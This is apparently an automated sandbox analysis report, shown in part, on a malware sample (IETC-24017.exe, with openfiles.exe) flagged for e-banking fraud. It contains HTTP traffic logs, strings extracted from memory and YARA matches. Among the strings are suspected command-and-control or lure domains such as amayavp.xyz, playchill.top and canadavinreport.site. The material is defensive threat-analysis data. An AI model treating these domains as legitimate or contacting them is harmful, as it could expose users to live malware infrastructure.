70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 25 Nov 2024 08:40:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeETag: W/"5d07e7ed-36b"Content-Encoding: gzipData Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a 8f 66 85 66 fb be 8a 90 92 b0 6c c1 e6 57 03 6e ea ff d4 d8 3b ac 9f 84 1f 5a b8 f0 04 68 f2 8b b3 3c 27 73 73 b1 d9 86 75 1d db d8 13 9a 1b 57 96 25 5f 60 14 7e 88 c1 72 d1 4c 11 fa 3a 51 56 7b ff 26 01 58 cc b5 be e7 79 e9 1d 93 cd 6c 6a ca ea e7 75 ae 14 40 79 c1 cf 1d 8b da 4a 60 ab d6 73 41 60 b1 f6 2b 51 ef ae ab e7 d6 7f ea 07 31 da 86 40 6b 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 09:04:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close ETag: W/"5d07e874-36b" Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 08:40:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close ETag: W/"5d07e7ed-36b" Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 09:04:31 GMT Content-Type: text/html Content-Length: 875 Connection: close ETag: "5d07e874-36b"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:43:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81xz05wKBT8Sl3SDWGNOdJn3MEcAMR0YwyOAfEgaqQbqFjqufv7zUcOmtkAQzo%2B3h9ExqowD0uIZFUHzVD7ktSeil5IOY5T5TcMPgX3intnXJq34sAcETHA5a2PakdwPW2Q3cTmxqjKO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e805a738b624243-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2309&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:43:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbCixQaEzHN9xIhIJBUogLDHdf4H77tAXBf%2BB0ouOOe%2BwsDDZmd5glId0gl9hG6i%2FEg1vSZsC5sssPf3emtV3r%2F6xSzPKAzaJPcL73LHjT%2Bvitkzeooq4f%2BU7U1P6yPgmYUpPT713ZSu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e805a8479ee42c2-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2062&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=818&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:43:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=140qK32yVEVwPJUhwoLOY23A3fzoHPiIF9DPqyWJedvfp9m8QPrs%2FKnVLKlX%2BYOGDw4Roh2XWPJVzozek8wk5MegsrOCnh%2FwIfNkc7PmXeZ4AfzKVM6mQFQWXLx2bPia7Q3z2s3lmoUx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e805a94e8a7c33d-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1693&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10900&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:43:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=syP%2F37s08wI9AxVRDoekntVfX73U30%2B44oBKnIB%2BQQF0Z1t%2BvLvzERA9Nskmksgz00azIRYOjYUancTjwINhbTKHr9EP3yRXkAzQ0Nlr6ahNkDIZCJ3YY93RgnHFtmejCWhmBXOzEjhr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e805aa5aec40f45-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=522&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:44:07 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DXZ5J92v8v4474zAStMVZH2IJAccT%2FyO1Zf05NZguCl4aoCPvv6%2Bpz2rhi3wM6pT0ldwT4TsqWYNLH097ooXBGFt6XZ0DiKzAhWRIWawfSonAhZKl3xDxPxi0d4%2F%2FpDKY1orWoVzJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e805ae21e7c4241-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2110&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=812&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:44:10 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=noHmE0Cv4jk80YcMc7uOgWc4bUwJBpwRoRMRIYOI%2BLnxemZh84X7hk3E%2BDmvX0CCPhvXnmSWcq8OEjiyJc%2FcA8rtet30ng%2Fb4qqQA9IGssozlWYDfN1IsYuffRth6eEVF%2FuZ5yGmpw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e805af30d814205-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10894&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:44:12 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyCgFL5MoDxFe%2F2B8Ls9%2B5Be5Xlj5hgtTh5W1L8Wzc5O4EhuipdKJe1hSMQW%2B6MFAFHWMy4HHVJ0z5PWSHyjU5XZIdSP0Iel3Z7UZ5l8UrwJWgs5PjjG2vBuK%2BUlCUl5gaFBl5CbAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e805b03ed547c6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1928&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 08:44:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 08:44:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 08:44:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 08:44:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cce1df-b96"
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 08:44:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 08:44:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 08:44:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Vary: Accept-Encoding
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:44:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:44:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:44:55 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:44:58 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:45:22 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT Accept-Ranges: bytes
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:45:24 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT Accept-Ranges: bytes
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 08:45:30 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 25 Nov 2024 08:45:53 GMT server: LiteSpeed
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 25 Nov 2024 08:45:55 GMT server: LiteSpeed
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 25 Nov 2024 08:45:58 GMT server: LiteSpeed
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 25 Nov 2024 08:46:01 GMT server: LiteSpeed
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                      Source: openfiles.exe, 00000007.00000002.4125167672.0000000005B1E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://pip1-loh.com/
                      Source: IETC-24017.exe, 00000000.00000002.1683716815.0000000002746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: IETC-24017.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005DD6000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.00000000054D6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/572a/?ifzt=hz/gBsBCliEB3liRCjDcUFpXpjm75vqUHY7uUC9CoicjvHiRwDII6Rr7fwqPQOBPL5
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006BF8000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.00000000062F8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/vvzz/?ifzt=cUYTrm/9WoUGLtXnEfHvigyvVWYscXEqz9Hmi7WWzB
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4130326224.0000000007D05000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cssa.auction
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4130326224.0000000007D05000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cssa.auction/omhm/
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: IETC-24017.exe, 00000000.00000002.1690156355.0000000005190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmtK
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: openfiles.exe, 00000007.00000002.4125167672.000000000598C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: IETC-24017.exe, 00000000.00000002.1690231019.00000000051D0000.00000004.00000020.00020000.00000000.sdmp, IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: IETC-24017.exe, 00000000.00000002.1690310371.00000000068B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4126711874.0000000007630000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4126711874.0000000007630000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://gamesfunny.top$
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.li
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4123887775.0000000002B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: openfiles.exe, 00000007.00000003.2004598316.000000000796C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://playchill.top/api/axgames/request?domain=$
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000006D8A000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.000000000648A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                      Source: openfiles.exe, 00000007.00000002.4126876869.0000000007988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: openfiles.exe, 00000007.00000002.4125167672.000000000661C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

                      E-Banking Fraud

                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
